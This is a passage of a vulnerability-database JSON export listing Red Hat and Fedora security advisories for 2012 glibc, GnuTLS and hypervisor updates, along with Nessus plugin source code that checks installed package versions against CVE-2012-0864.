Dynamics for reporting\nCVE-2012-1569 and CVE-2012-1573.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. 
The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2011-4128 (gnutls issue)\n\nCVE-2012-1583 (kernel issue)\n\nCVE-2011-3045 (libpng issue)\n\nCVE-2012-0884 and CVE-2012-1165 (openssl issues)\n\nFurther information on the changes made to the package is available on the\nrelevant errata:\n\nhttps://rhn.redhat.com/errata/RHBA-2012-0398.html\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "modified": "2019-03-22T23:44:58", "published": "2012-04-17T04:00:00", "id": "RHSA-2012:0488", "href": "https://access.redhat.com/errata/RHSA-2012:0488", "type": "redhat", "title": "(RHSA-2012:0488) Important: rhev-hypervisor5 security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4128", "CVE-2012-0060", "CVE-2012-0061", "CVE-2012-0815", "CVE-2012-0864", "CVE-2012-0879", "CVE-2012-0884", "CVE-2012-1090", "CVE-2012-1097", "CVE-2012-1165", "CVE-2012-1569", "CVE-2012-1573"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way libtasn1 decoded DER data. 
An attacker could\ncreate carefully-crafted DER encoded input (such as an X.509 certificate)\nthat, when parsed by an application that uses libtasn1 (such as\napplications using GnuTLS), could cause the application to crash.\n(CVE-2012-1569)\n\nA flaw was found in the way GnuTLS decrypted malformed TLS records. This\ncould cause a TLS/SSL client or server to crash when processing a\nspecially-crafted TLS record from a remote TLS/SSL connection peer.\n(CVE-2012-1573)\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass FORTIFY_SOURCE\nprotections and execute arbitrary code using a format string flaw in an\napplication, even though these protections are expected to limit the\nimpact of such flaws to an application abort. (CVE-2012-0864)\n\nRed Hat would like to thank Matthew Hall of Mu Dynamics for reporting\nCVE-2012-1569 and CVE-2012-1573.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2011-4128 (gnutls issue)\n\nCVE-2012-0879, CVE-2012-1090, and CVE-2012-1097 (kernel issues)\n\nCVE-2012-0884 and CVE-2012-1165 (openssl issues)\n\nCVE-2012-0060, CVE-2012-0061, and CVE-2012-0815 (rpm issues)\n\nThis update also fixes the following bug:\n\n* The Hypervisor previously set the lro_disable option for the enic driver.\nThe driver does not support this option, as a result the Hypervisor did\nnot correctly detect and configure the network interfaces of a Cisco M81KR\nadaptor, when present. The Hypervisor has been updated and no longer sets\nthe invalid option for this driver. 
(BZ#809463)\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "modified": "2018-06-07T08:59:46", "published": "2012-04-30T04:00:00", "id": "RHSA-2012:0531", "href": "https://access.redhat.com/errata/RHSA-2012:0531", "type": "redhat", "title": "(RHSA-2012:0531) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2012-03-08T05:00:09", "published": "2012-03-08T05:00:09", "id": "FEDORA:A7A8121248", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: glibc-2.14.1-6", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. 
", "modified": "2012-03-08T03:55:46", "published": "2012-03-08T03:55:46", "id": "FEDORA:7635A20E7B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: glibc-2.14.1-6", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. ", "modified": "2012-02-25T08:36:01", "published": "2012-02-25T08:36:01", "id": "FEDORA:3722721573", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: glibc-2.14.90-24.fc16.6", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0864"], "description": "The glibc package contains standard libraries which are used by multiple programs on the system. In order to save disk space and memory, as well as to make upgrading easier, common system code is kept in one place and shared between programs. This particular package contains the most important sets of shared libraries: the standard C library and the standard math library. Without these two libraries, a Linux system will not function. 
", "modified": "2012-02-28T11:00:00", "published": "2012-02-28T11:00:00", "id": "FEDORA:71D9321EDD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: glibc-2.15-23.fc17", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-09-25T08:55:15", "description": "From Red Hat Security Advisory 2012:0393 :\n\nUpdated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. 
(BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.", "edition": 20, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : glibc (ELSA-2012-0393)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:nscd", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:glibc-static", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc"], "id": "ORACLELINUX_ELSA-2012-0393.NASL", "href": "https://www.tenable.com/plugins/nessus/68497", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0393 and \n# Oracle Linux Security Advisory ELSA-2012-0393 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68497);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"RHSA\", value:\"2012:0393\");\n\n script_name(english:\"Oracle Linux 6 : glibc (ELSA-2012-0393)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0393 :\n\nUpdated glibc packages that fix one security issue and three bugs are\nnow 
available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. (BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. 
(BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002702.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"glibc-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-devel-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-static-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T09:14:00", "description": "Updated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. (BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. 
(BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.", "edition": 20, "published": "2012-03-16T00:00:00", "title": "RHEL 6 : glibc (RHSA-2012:0393)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-03-16T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "id": "REDHAT-RHSA-2012-0393.NASL", "href": "https://www.tenable.com/plugins/nessus/58361", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0393. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58361);\n script_version (\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-0864\");\n script_bugtraq_id(52201);\n script_xref(name:\"RHSA\", value:\"2012:0393\");\n\n script_name(english:\"RHEL 6 : glibc (RHSA-2012:0393)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue and three bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n* Previously, the dynamic loader generated an incorrect ordering for\ninitialization according to the ELF specification. This could result\nin incorrect ordering of DSO constructors and destructors. With this\nupdate, dependency resolution has been fixed. 
(BZ#783999)\n\n* Previously, locking of the main malloc arena was incorrect in the\nretry path. This could result in a deadlock if an sbrk request failed.\nWith this update, locking of the main arena in the retry path has been\nfixed. This issue was exposed by a bug fix provided in the\nRHSA-2012:0058 update. (BZ#795328)\n\n* Calling memcpy with overlapping arguments on certain processors\nwould generate unexpected results. While such code is a clear\nviolation of ANSI/ISO standards, this update restores prior memcpy\nbehavior. (BZ#799259)\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.\"\n );\n # https://rhn.redhat.com/errata/RHSA-2012-0058.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0864\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0393\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.47.el6_2.9\")) 
flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.9\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T09:49:32", "description": "The glibc packages provide the standard C and standard math libraries\nused by multiple programs on the system. Without these libraries, the\nLinux system cannot function correctly.\n\nAn integer overflow flaw was found in the implementation of the printf\nfunctions family. This could allow an attacker to bypass\nFORTIFY_SOURCE protections and execute arbitrary code using a format\nstring flaw in an application, even though these protections are\nexpected to limit the impact of such flaws to an application abort.\n(CVE-2012-0864)\n\nThis update also fixes the following bugs :\n\n - Previously, the dynamic loader generated an incorrect\n ordering for initialization according to the ELF\n specification. This could result in incorrect ordering\n of DSO constructors and destructors. 
With this update,\n dependency resolution has been fixed.\n\n - Previously, locking of the main malloc arena was\n incorrect in the retry path. This could result in a\n deadlock if an sbrk request failed. With this update,\n locking of the main arena in the retry path has been\n fixed. This issue was exposed by a bug fix provided in a\n previous update.\n\n - Calling memcpy with overlapping arguments on certain\n processors would generate unexpected results. While such\n code is a clear violation of ANSI/ISO standards, this\n update restores prior memcpy behavior.\n\nAll users of glibc are advised to upgrade to these updated packages,\nwhich contain patches to resolve these issues.", "edition": 14, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL6.x i386/x86_64 (20120315)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-static", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:nscd", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:glibc-headers"], "id": "SL_20120315_GLIBC_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61284", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61284);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-0864\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL6.x i386/x86_64 
